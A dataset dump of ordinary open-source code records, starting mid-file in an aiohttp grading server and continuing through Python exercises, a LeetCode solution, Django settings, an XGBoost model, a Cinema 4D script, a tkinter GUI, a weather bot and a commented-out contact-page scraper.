headers=headers)\n else:\n tpoints = '\\n'.join([f\"{p.comment}: {p.points}/{p.out_of}\"\n for p in points])\n if points:\n comment = f\"{tpoints}\\n\\n{comment}\"\n\n oknok = \"ok\" if result else \"nok\"\n return web.Response(text=f\"{oknok}~~{comment}\\n\",\n headers=headers)\n\n return handle_eval\n\n\ndef get_handle_admin(conf : config.Config):\n async def handle_admin(req : web.Request) -> web.Response:\n # assuming we run behind a proxy which sets this\n auth_user = req.match_info.get(\"user\")\n if auth_user is None:\n return web.Response(status=401, text=\"No user info\\n\")\n\n course_name = req.match_info.get(\"course_id\")\n if course_name is None:\n return web.Response(status=404,\n text=f\"No course given for {auth_user}\\n\")\n course = conf.courses.get(course_name.lower())\n print(f\"ADMIN attempt HTTP auth user {auth_user} for {course_name}\")\n\n if course is None:\n return web.Response(status=404,\n text=f\"Course {course_name} not found\\n\")\n if auth_user not in course.authorized:\n return web.Response(\n status=401,\n text=f\"User {auth_user} not authorized for {course_name}\\n\")\n print(f\"ADMIN authorized for {auth_user}/{course_name} at \"\n f\"{time.asctime()}\")\n\n page = req.match_info.get(\"page\")\n return await admin.get(req, course, auth_user, page)\n\n return handle_admin\n\n\ndef main() -> None:\n conf = config.parse(sys.argv)\n slots = cgroup.SlotManager(conf.limit)\n if not slots.available() and conf.limit.any_set():\n print(\"W: limits requested but cgroups are not available\",\n file=sys.stderr, flush=True)\n start_web(conf, slots)\n\n\ndef start_web(conf : config.Config, slots : cgroup.SlotManager) -> None:\n async def shutdown():\n print(\"letting runner do cleanup\")\n await runner.cleanup()\n\n def sigusr1_handler() -> None:\n print(\"Received SIGUSR1, shutting down...\")\n loop.create_task(shutdown())\n\n async def stop_loop(app) -> None:\n print(\"shutdown\")\n loop.stop()\n\n async def start_runner(runner, conf : config.Config):\n await runner.setup()\n site : Optional[Union[web.TCPSite, web.UnixSite, web.SockSite]] = None\n if conf.port is not None:\n print(f\"Starting HTTP server on localhost:{conf.port}\")\n site = web.TCPSite(runner, 'localhost', conf.port)\n elif conf.socket is not None:\n print(f\"Starting UNIX socket server on {conf.socket}\")\n site = web.UnixSite(runner, conf.socket)\n elif conf.socket_fd is not 
None:\n print(f\"Starting UNIX socket server on FD {conf.socket_fd}\")\n sock = socket.socket(fileno=conf.socket_fd)\n site = web.SockSite(runner, sock)\n assert site is not None, \"Invalid config, no listening address\"\n return await site.start()\n\n app = web.Application()\n templates_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n \"templates\")\n aiohttp_mako.setup(app, input_encoding='utf-8', output_encoding='utf-8',\n default_filters=['decode.utf8'],\n directories=[templates_dir])\n\n eval_sem = asyncio.BoundedSemaphore(conf.max_workers)\n\n handle_is = get_eval_handler(eval_sem, conf, slots,\n InterfaceMode.IS | InterfaceMode.Priviledged)\n app.router.add_get(\"/is\", handle_is)\n app.router.add_post(\"/is\", handle_is)\n\n handle_hint = get_eval_handler(eval_sem, conf, slots, InterfaceMode.Null)\n app.router.add_get(\"/hint\", handle_hint)\n app.router.add_post(\"/hint\", handle_hint)\n\n handle_internal = get_eval_handler(eval_sem, conf, slots,\n InterfaceMode.Priviledged)\n app.router.add_get(\"/internal\", handle_internal)\n app.router.add_post(\"/internal\", handle_internal)\n\n handle_admin = get_handle_admin(conf)\n app.router.add_get(\"/admin/{user}/{course_id}/\", handle_admin)\n app.router.add_post(\"/admin/{user}/{course_id}/\", handle_admin)\n app.router.add_get(\"/admin/{user}/{course_id}/{page}\", handle_admin)\n app.router.add_post(\"/admin/{user}{course_id}/{page}\", handle_admin)\n\n runner = web.AppRunner(app, handle_signals=True)\n app.on_cleanup.append(stop_loop)\n\n loop = asyncio.get_event_loop()\n loop.add_signal_handler(signal.SIGUSR1, sigusr1_handler)\n try:\n loop.run_until_complete(start_runner(runner, conf))\n except Exception:\n print(\"ERROR starting server\", file=sys.stderr)\n traceback.print_exc()\n sys.exit(1)\n\n print(\"started, loaded following configuration:\")\n conf.dump(sys.stdout)\n try:\n loop.run_forever()\n finally:\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n# vim: colorcolumn=80 expandtab sw=4 ts=4\n","sub_path":"src/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"64155433","text":"\n# n = 10\n# nums = []\n# for i in range(n):\n# num = int(input(\"输入任意整数以\"))\n# nums.append(num)\n# # 获取最大值和最小值\n# imax = 0\n# imin = 0\n# for num in nums:\n# if imax < num:\n# imax = num\n#\n# if imin > num:\n# imin = num\n# # 采用 str.format() 打印结果\n# print(\"输入生成的10个数字为{},最大值为{},最小值为{}\".format(num,imax,imin))\n\n# n = 10\n# imax = 0\n# imin = 0\n# for i in range(n):\n# num = int(input(\"输入任意整数>>>\"))\n# if num > imax:\n# imax = num\n# if num < imin:\n# imin = num\n# print(\"10次输入获取的数字中,最大值为{},最小值为{}\".format(imax,imin))\n\n\n\n# 从键盘依次输入10个数,最后打印最大的数、10个数的和、和平均数。\nmax = 0#赋值\nsum = 0\navg = 0\nfor num in range(10):#限制输入次数\n str = int(input(\"请输入第{}个数:\".format(num+1)))\n sum += float(str)\n avg = sum / 10\n if str > max:\n max=str\nprint(\"最大数是:{}\".format(max))\nprint(\"十个数的和是:{}\".format(sum))\nprint(\"十个数的平均数是:{}\".format(avg))","sub_path":"平均值.py","file_name":"平均值.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8774878","text":"from typing import List\n\n#\n# @lc app=leetcode id=33 lang=python3\n#\n# [33] Search in Rotated Sorted Array\n#\n\n# @lc code=start\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n low = 0\n high = len(nums) - 1\n while low <= 
high:\n mid = low + (high - low) // 2\n if nums[mid] == target:\n return mid\n if nums[low] <= nums[mid]:\n if target > nums[mid] or target < nums[low]:\n low = mid + 1\n else:\n high = mid - 1\n else:\n if target < nums[mid] or target > nums[high]:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n\n\n# @lc code=end\nif __name__ == \"__main__\":\n s = Solution()\n nums = [4, 5, 6, 7, 0, 1, 2]\n print(s.search(nums, 0))\n","sub_path":"binarysearch/33.search-in-rotated-sorted-array.py","file_name":"33.search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"423847782","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom __future__ import unicode_literals\nimport os\n\nfrom capetown.core.settings.base import *\n\n# Path helper\nlocation = lambda x: os.path.join(os.path.dirname(os.path.realpath(__file__)), x)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\n# Haystack settings\nHAYSTACK_CONNECTIONS = {\n \"default\": {\n \"ENGINE\": \"haystack.backends.whoosh_backend.WhooshEngine\",\n \"PATH\": location(\"haystack\"),\n },\n}\n\nINSTALLED_APPS = [\"sandbox\"] + list(INSTALLED_APPS)\n# Application definition\n\n# Wagtail settings\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [location(\"templates\"), location(\"templates/oscar\"),],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"oscar.apps.search.context_processors.search_form\",\n \"oscar.apps.checkout.context_processors.checkout\",\n \"oscar.apps.customer.notifications.context_processors.notifications\",\n \"oscar.core.context_processors.metadata\",\n ],\n },\n },\n]\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\"ENGINE\": \"django.db.backends.sqlite3\", \"NAME\": location(\"db.sqlite3\"),}\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n]\n\nSTATICFILES_DIRS = [location(\"static/\")]\n\n# ManifestStaticFilesStorage is recommended in production, to prevent outdated\n# Javascript / CSS assets being served from cache (e.g. 
after a Wagtail upgrade).\n# See https://docs.djangoproject.com/en/2.2/ref/contrib/staticfiles/#manifeststaticfilesstorage\n\nSTATIC_ROOT = location(\"public/static\")\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = location(\"public/media\")\nMEDIA_URL = \"/media/\"\n","sub_path":"sandbox/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216618654","text":"import pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom sklearn.preprocessing import LabelEncoder\nimport re \nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom pandas.tseries.holiday import USFederalHolidayCalendar as calendar\nimport nltk \nimport xgboost as xgb\n\nfrom extract_feat_base import * \n\n### FUNC ########################################################################\ndef xgb_feat_importance(model,cols,file_name):\n print('-----> Feature importance ... ')\n feature_importance_dict = model.get_fscore()\n fs = ['f%i' % i for i in range(len(cols))]\n f1 = pd.DataFrame({'f': list(feature_importance_dict.keys()), 'importance': list(feature_importance_dict.values())})\n f2 = pd.DataFrame({'f': fs, 'feature_name': cols})\n feature_importance = pd.merge(f1, f2, how='right', on='f')\n feature_importance = feature_importance.fillna(0)\n feature_importance.sort_values(by='importance', ascending=False)\n print(feature_importance.sort_values)\n feature_importance.to_csv(file_name, index=False) \n#################################################################################\n\n\n### FEATURE ENG. ################################################################\nmeta = {'target': 'deal_probability', \n 'test_id': 'item_id', \n 'cols': {\n 'item_id': 'REM', \n 'user_id': 'CAT', \n 'region': 'CAT', \n 'city': 'CAT', \n 'parent_category_name': 'CAT',\n 'category_name': 'CAT',\n 'param_1': 'CAT', \n 'param_2': 'CAT', \n 'param_3': 'CAT', \n 'title': 'LEN', \n 'description': 'LEN' , \n 'price': 'NUM', \n 'item_seq_number': 'NUM', \n 'activation_date': 'DATE', \n 'user_type': 'CAT', \n 'image': 'REM',\n 'image_top_1': 'NUM'\n }}\n\ntrain = pd.read_csv('data/train.csv')\ntest = pd.read_csv('data/test.csv')\n\nprint('--------------> Basic Feature Engineering ... ')\nall_data , y_train = encode_dataset(train=train,test=test,meta=meta)\nprint(all_data.head())\n#################################################################################\n\n### MODELING ####################################################################\nprint('--------------> Modeling ... ')\ntrain_obs = len(y_train)\nXtr, Xv, ytr, yv = train_test_split(all_data[:train_obs].values, y_train, test_size=0.1, random_state=1973)\ndtrain = xgb.DMatrix(Xtr, label=ytr)\ndvalid = xgb.DMatrix(Xv, label=yv)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nwatchlist = [(dtrain, 'train'), (dvalid, 'valid')]\n\n#Try different parameters! My favorite is random search :)\nxgb_pars = {'min_child_weight': 50,\n 'eta': 0.01,\n 'colsample_bytree': 0.5, #0.3\n 'max_depth': 15, # 10\n 'subsample': 0.5, #0.8\n 'lambda': 0.5,\n 'nthread': -1,\n 'booster' : 'gbtree',\n 'silent': 1,\n 'eval_metric': 'rmse',\n 'objective': 'reg:linear'}\n\nmodel = xgb.train(xgb_pars, dtrain, 10000, watchlist, early_stopping_rounds=50,maximize=False, verbose_eval=10)\n\nprint('Modeling RMSE %.5f' % model.best_score)\n\nprint('--------------> Submission ... 
')\ntest[meta['target']] = model.predict(dtest)\nsubfn = \"base1_eta001_val_\"+str(model.best_score)+\"__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[[meta['test_id'], meta['target']]].to_csv(subfn, index=False)\n\nprint('--------------> Retrain all data + Feature importance ... ')\ndtrain = xgb.DMatrix(all_data[:train_obs].values, label=y_train)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nmodel = xgb.train(xgb_pars, dtrain, model.best_iteration+5, maximize=False, verbose_eval=10)\nprint('-----> Submission ... ')\ntest[meta['target']] = model.predict(dtest)\nsubfn = \"base1_eta001_all_data__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[[meta['test_id'], meta['target']]].to_csv(subfn, index=False)\n\nxgb_feat_importance(model=model,cols=all_data.columns,file_name=\"feat_importance_base1_eta001.csv\")\n#################################################################################\n\n\n","sub_path":"competitions/avito-demand-prediction/tentatives/base_xgb.py","file_name":"base_xgb.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"644260691","text":"\"\"\"\nAR_ObjectToSpline\n\nAuthor: Arttu Rautio (aturtur)\nWebsite: http://aturtur.com/\nName-US: AR_ObjectToSpline\nVersion: 1.0\nDescription-US: Converts selected object(s) to splines\n\nWritten for Maxon Cinema 4D R21.207\nPython version 2.7.14\n\"\"\"\n# Libraries\nimport c4d\nfrom c4d import utils as u\n\n# Functions\ndef main():\n doc = c4d.documents.GetActiveDocument() # Get active Cinema 4D document\n doc.StartUndo() # Start recording undos\n storeMode = doc.GetMode() # Get current editor mode\n doc.SetMode(c4d.Medges) # Set editor mode to 'Edges'\n selection = doc.GetActiveObjects(0) # Get active objects\n makeEditable = c4d.MCOMMAND_MAKEEDITABLE # Mcommand 'Make Editable'\n selectAll = c4d.MCOMMAND_SELECTALL # Mcommand 'Select All'\n edgeToSpline = c4d.MCOMMAND_EDGE_TO_SPLINE # Mcommand 'Edge To Spline'\n modeEdgeSel = c4d.MODELINGCOMMANDMODE_EDGESELECTION # Modeling command mode 'Edge Selection'\n createUndo = c4d.MODELINGCOMMANDFLAGS_CREATEUNDO # Modeling command flag 'Create undo'\n bc = c4d.BaseContainer() # Initialize base container\n u.SendModelingCommand(makeEditable, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Make Editable'\n u.SendModelingCommand(selectAll, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Select All'\n u.SendModelingCommand(edgeToSpline, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Edge To Spline'\n for obj in selection: # Iterate through selected objects\n spline = obj.GetDown() # Get spline\n doc.AddUndo(c4d.UNDOTYPE_NEW, spline) # Add undo for inserting spline object\n spline.InsertAfter(obj) # Move spline next to original object\n spline.SetMg(obj.GetMg()) # Reset spline objects matrix\n obj.Remove() # Delete original object\n doc.SetMode(storeMode) # Set editor mode back as it was\n doc.EndUndo() # End recording undos\n c4d.EventAdd() # Refresh Cinema 4D\n \n# Execute main()\nif __name__=='__main__':\n main()","sub_path":"AR_Scripts_1.0.16_R21_Deprecated/AR_ObjectToSpline.py","file_name":"AR_ObjectToSpline.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"242123107","text":"# from kivy.app import App\nfrom utils import globals\n\n\nclass ClientThreadSelector:\n\n def __init__(self, server_thread):\n self.client_thread = 
None\n self.server_thread = server_thread\n self.client_dict_lists = {}\n self.open_selection()\n\n def open_selection(self):\n self.client_dict_lists = {\"0\": \"asdf\"}\n\n def get_connected_client(self, *args):\n args[0].dismiss()\n current_client_idx = args[1]\n globals.checked_item = \"\"\n print(self.client_dict_lists[current_client_idx])\n # self.client_thread = self.server_thread.client_thread[int(current_client_idx)]\n\n\nif __name__ == '__main__':\n\n print(ClientThreadSelector(server_thread=None).client_thread)\n","sub_path":"utils/client_thread_select.py","file_name":"client_thread_select.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"635498222","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 1 13:19:44 2019\n\n@author: chenchen\n\"\"\"\n\nimport tkinter as tk\nimport tkinter.messagebox\nimport tkinter.ttk\n\n\nroot = tk.Tk()\nroot.title(\"Get Data from LONGi DB\")\nroot[\"height\"] = 800\nroot[\"width\"] = 1600\n\n\nlabel_station = tk.Label(root, text=\"SolarStation:\", justify=tk.RIGHT, width=50)\nlabel_station.place(x=20, y=40, width=100, height=50)\nD_stations_info = {\n \"hami\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\", \n \"inverter_13\", \"inverter_14\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }, \n \"daqing\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }, \n \"pucheng\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\", \n \"inverter_13\", \"inverter_14\", \"inverter_15\", \"inverter_16\", \n \"inverter_17\", \"inverter_18\", \"inverter_19\", \"inverter_20\", \n \"inverter_21\", \"inverter_22\", \"inverter_23\", \"inverter_24\", \n \"inverter_25\", \"inverter_26\", \"inverter_27\", \"inverter_28\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }\n }\n\n#combo_station = tkinter.ttk.Combobox(root, width=50, values=tuple(D_stations_info.keys()))\n#combo_station.place(x=130, y=40, width=100, height=30)\n#\n#\n#combo_devType = tkinter.ttk.Combobox(root, width=50)\n#combo_devType.place(x=300, y=40, 
width=100, height=30)\n#\n#combo_table = tkinter.ttk.Combobox(root, width=50)\n#combo_table.place(x=400, y=40, width=100, height=30)\n#\n#combo_field = tkinter.ttk.Combobox(root, width=50)\n#combo_field.place(x=500, y=40, width=100, height=30)\n#\n#\n#\n#def comboChange(event):\n#    station = combo_station.get()\n#    if station:\n#        combo_devType["values"] = tuple(D_stations_info[station].keys())\n#    else:\n#        combo_devType.set([])\n#combo_station.bind('<<ComboboxSelected>>', comboChange)\n#\n#\n#\n#def combo222(event):\n#    station = combo_station.get()\n#    devType = combo_devType.get()\n#    if devType:\n#        print("ok")\n#        combo_table["values"] = tuple(D_stations_info[station][devType]["table"])\n#        combo_field["values"] = tuple(D_stations_info[station][devType]["field"])\n#    else:\n#        combo_table.set([])\n#        combo_field.set([]) \n#combo_devType.bind('<<ComboboxSelected>>', combo222)\n\n\n\nL_table = ["inverter_01", "inverter_02", "inverter_03", "inverter_04", \n           "inverter_05", "inverter_06", "inverter_07", "inverter_08", \n           "inverter_09", "inverter_10", "inverter_11", "inverter_12", \n           "inverter_13", "inverter_14", "inverter_15", "inverter_16", \n           "inverter_17", "inverter_18", "inverter_19", "inverter_20", \n           "inverter_21", "inverter_22", "inverter_23", "inverter_24", \n           "inverter_25", "inverter_26", "inverter_27", "inverter_28"]\n\n#frame_root = tkinter.Frame(root)\nframe_01 = tkinter.Frame(root, container=True)\nframe_01.pack(side="bottom")\n\ncheck_var_01 = tk.IntVar()\ncheck_01 = tk.Checkbutton(frame_01, text = "inverter_01", variable=check_var_01, \n                          onvalue=1, offvalue=0, height=5, width=20)\ncheck_01.pack()\n\n\n\n\n\n\n\n\n\n\n'''\ndef comboChange(event):\n    station = combo_station.get()\n    if station:\n        combo_devType["values"] = tuple(D_stations_info[station].keys())\n        devType = combo_devType.get()\n        if devType:\n            print("ok")\n            combo_table["values"] = tuple(D_stations_info[station][devType]["table"])\n            combo_field["values"] = tuple(D_stations_info[station][devType]["field"])\n        else:\n            combo_table.set([])\n            combo_field.set([])\n    else:\n        combo_devType.set([])\ncombo_station.bind('<<ComboboxSelected>>', comboChange)\n\n'''\n\n\n\n\n\n'''\nvar_station = tk.StringVar()\nvar_station.set('')\n\nvar_ssh_name = tk.IntVar()\nvar_ssh_name.set('')\nvar_ssh_pwd = tk.IntVar()\nvar_ssh_pwd.set('')\n\nvar_mysql_name = tk.IntVar()\nvar_mysql_name.set('')\nvar_mysql_pwd = tk.IntVar()\nvar_mysql_pwd.set('')\n\n\nvar_start_year = tk.IntVar()\nvar_start_year.set(0)\nvar_start_month = tk.IntVar()\nvar_start_month.set(0)\nvar_start_day = tk.IntVar()\nvar_start_day.set(0)\nvar_start_hour = tk.IntVar()\nvar_start_hour.set(0)\nvar_start_minute = tk.IntVar()\nvar_start_minute.set(0)\n\nvar_end_year = tk.IntVar()\nvar_end_year.set(0)\nvar_end_month = tk.IntVar()\nvar_end_month.set(0)\nvar_end_day = tk.IntVar()\nvar_end_day.set(0)\nvar_end_hour = tk.IntVar()\nvar_end_hour.set(0)\nvar_end_minute = tk.IntVar()\nvar_end_minute.set(0)\n\n\n\n\nlabel_station = tk.Label(root, text="Station:", justify=tk.RIGHT, width=80)\nlabel_station.place(x=10, y=5, width=80, height=20)\nentry_station = tk.Entry(root, width=80, textvariable=var_station)\nentry_station.place(x=100, y=5, width=80,height=20)\n\nlabel_ssh_name = tk.Label(root, text="ECS Name:", justify=tk.RIGHT, width=80)\nlabel_ssh_name.place(x=10, y=30, width=80, height=20)\nentry_ssh_name = tk.Entry(root, width=80, textvariable=var_ssh_name)\nentry_ssh_name.place(x=100, y=30, width=80,height=20)\n\nlabel_ssh_pwd = tk.Label(root, text="ECS 
pwd:\", justify=tk.RIGHT, width=80)\nlabel_ssh_pwd.place(x=10, y=55, width=80, height=20)\nentry_ssh_pwd = tk.Entry(root, width=80, textvariable=var_ssh_pwd)\nentry_ssh_pwd.place(x=100, y=55, width=80,height=20)\n\n\nlabel_mysql_name = tk.Label(root, text=\"SQL Nmae:\", justify=tk.RIGHT, width=80)\nlabel_mysql_name.place(x=10, y=80, width=80, height=20)\nentry_mysql_name = tk.Entry(root, width=80, textvariable=var_mysql_name)\nentry_mysql_name.place(x=100, y=80, width=80,height=20)\n\nlabel_mysql_pwd = tk.Label(root, text=\"SQL pwd:\", justify=tk.RIGHT, width=80)\nlabel_mysql_pwd.place(x=10, y=105, width=80, height=20)\nentry_mysql_pwd = tk.Entry(root, width=80, textvariable=var_mysql_pwd)\nentry_mysql_pwd.place(x=100, y=105, width=80,height=20)\n'''\n\n\n'''\ndef execute():\n station = entry_station.get()\n ssh_name = entry_ssh_name.get()\n ssh_passwd = entry_ssh_pwd.get()\n mysql_name = entry_mysql_name.get()\n mysql_passwd = entry_mysql_pwd.get()\n \n''' \n\n \n\n\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_tk.py","file_name":"test_tk.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"173088674","text":"import os\nimport random\nimport string\nimport tempfile\n\nimport matplotlib.pyplot as plt\nimport requests\n\nimport keys\nfrom utils import config\n\n\nclass Meteum:\n def __init__(self):\n self.url = config.WEATHER_PAGE\n self.weather_header = {\n 'X-Yandex-API-Key': keys.WEATHER_KEY\n }\n\n self.forecast_template = config.FORECAST_TEMPLATE\n\n def _make_request(self, params):\n req = requests.get(\n url=self.url,\n params={\"geoid\": params[\"geoid\"]}, headers=self.weather_header)\n req = req.json()\n return req\n\n def predict(self, params):\n \"\"\"\n :param params: params for request, geoid and predict_day\n :return:\n \"\"\"\n req = self._make_request(params)\n\n if params[\"predict_day\"] < 0:\n response = self._draw_plot(req, params)\n response[\"search_condition\"] = config.SEARCH_CONDITIONS[\n req[\"forecasts\"][0][\"parts\"][\"day\"][\"condition\"]\n ]\n response.update(req[\"forecasts\"][0])\n return response\n else:\n day_forecast = req[\"forecasts\"][params[\"predict_day\"]]\n # print(day_forecast)\n print(config.TRANSLATE_CONDITIONS[day_forecast[\"parts\"][\"day\"][\n \"condition\"]])\n text_response = self.forecast_template.format(\n params[\"ru_city\"].title(),\n day_forecast[\"date\"],\n day_forecast[\"parts\"][\"day\"][\"temp_avg\"],\n day_forecast[\"parts\"][\"night\"][\"temp_avg\"],\n day_forecast[\"parts\"][\"day\"][\"wind_speed\"],\n day_forecast[\"parts\"][\"day\"][\"pressure_mm\"],\n config.CLOUDNESS[day_forecast[\"parts\"][\"day\"][\"cloudness\"]][\n \"emoji\"] + \" \" + config.CLOUDNESS[day_forecast[\"parts\"][\n \"day\"][\"cloudness\"]][\"ru\"],\n config.EMOJI_CONDITIONS[day_forecast[\"parts\"][\"day\"][\n \"condition\"]] + \" \" + config.TRANSLATE_CONDITIONS[\n day_forecast[\"parts\"][\"day\"][\"condition\"]]\n )\n response = {\"plot\": False, \"text\": text_response,\n \"search_condition\": config.SEARCH_CONDITIONS[\n day_forecast[\"parts\"][\"day\"][\"condition\"]\n ]}\n response.update(day_forecast)\n return response\n\n def _draw_plot(self, req, params):\n dates, temp_day, temp_night = [], [], []\n for day_forecast in req[\"forecasts\"]:\n dates.append(day_forecast[\"date\"])\n temp_day.append(day_forecast[\"parts\"][\"day\"][\"temp_avg\"])\n temp_night.append(day_forecast[\"parts\"][\"night\"][\"temp_avg\"])\n\n fig 
= plt.figure(figsize=(15, 10))\n        ax = plt.subplot(111)\n        ax = plt.plot(dates, temp_day, \"-o\", label=\"Day\")\n        ax = plt.plot(dates, temp_night, \"-o\", label=\"Night\")\n        plt.grid(ls=\":\")\n        plt.title(\n            \"Average day and night temperature in {} over {} days\".format(\n                params[\"ru_city\"].title(), len(dates)), fontsize=18)\n        plt.xlabel(\"Day\", fontsize=15)\n        plt.ylabel(\"Temperature, °C\", fontsize=15)\n        plt.legend(loc=\"best\", fontsize=15)\n        plt.yticks(fontsize=15)\n        random_name = \"\".join(\n            random.choices(string.ascii_letters, k=10)) + \".png\"\n\n        print(random_name)\n        path_to_save = os.path.join(tempfile.gettempdir(), random_name)\n        print(path_to_save)\n        fig.savefig(path_to_save, pad_inches=0)\n        return {\n            \"plot\": True,\n            \"path_to_plot\": path_to_save\n        }\n\n\nif __name__ == '__main__':\n    meteum = Meteum()\n    pred = meteum.predict({\n        \"ru_city\": \"Санкт-Петербург\",\n        'geoid': 2,\n        'predict_day': 0\n    })\n","sub_path":"1st-term/Python/telegram-bot/yandex_weather/meteum.py","file_name":"meteum.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"173932167","text":"# -*- coding:utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas\nfrom pandas import DataFrame, merge, read_csv\n'''\nurlTable = read_csv('pardot.csv')\nattechList = DataFrame(data={'attechList': [\"/contact\", \"/contact.html\", \"/contact/index.html\", \"/inquiry\", \"/inquiry.html\", \"/inquiry/index.html\",\n                                            \"/contact-us\", \"/contact-us.html\", \"/contact-us/index.html\", \"/contactus\", \"/contactus.html\", \"/contactus/index.html\", \"/information\",\n                                            \"/information.html\", \"/information/index.html\", \"/info\", \"/info.html\", \"/info/index.html\", \"/contact_us\", \"/contact_us.html\", \"/contact_us/index.html\"]})\n\n################################## Request And Find 'input'Tag ########################################################################################################################################\n\ntarget = list()\ni = 0\ninputTagCount = 0\nfor url in urlTable['Domain']:\n    try:\n        for attectUrl in attechList['attechList']:\n            inputTagUrl = list()\n            targetUrl = url+attectUrl\n            targetUrl2 = targetUrl.replace('http://', '')\n            request = requests.get(targetUrl, timeout=60)\n            targetRequest = request.url\n            targetRequestStatus_code = request.status_code\n            targetHtml = request.text\n            if targetRequestStatus_code == 200 and targetUrl2 in targetRequest:\n                soup = BeautifulSoup(targetHtml, 'html.parser')\n                formTagList = soup.find_all('form')\n                inputTagCount = 0\n                for form in formTagList:\n                    inputTagList = form.find_all('input')\n                    if len(inputTagList) > 0:\n                        inputTagCount += 1\n                if inputTagCount > 0:\n                    inputTagUrl.append(targetRequest)\n                    print(targetUrl + ' matched_and_Find_inputTag~!')\n                    open(\"./html/\"+str(i)+\".txt\", \"w\",\n                         encoding='utf8').write(request.text)\n                    i += 1\n            if len(inputTagUrl) > 0:\n                target = target + inputTagUrl\n    except Exception:\n        pass\n\nif len(target) > 0:\n    df = pandas.DataFrame(data={\"url\": target})\n    df.to_csv(\"targetUrl.csv\", sep=',', 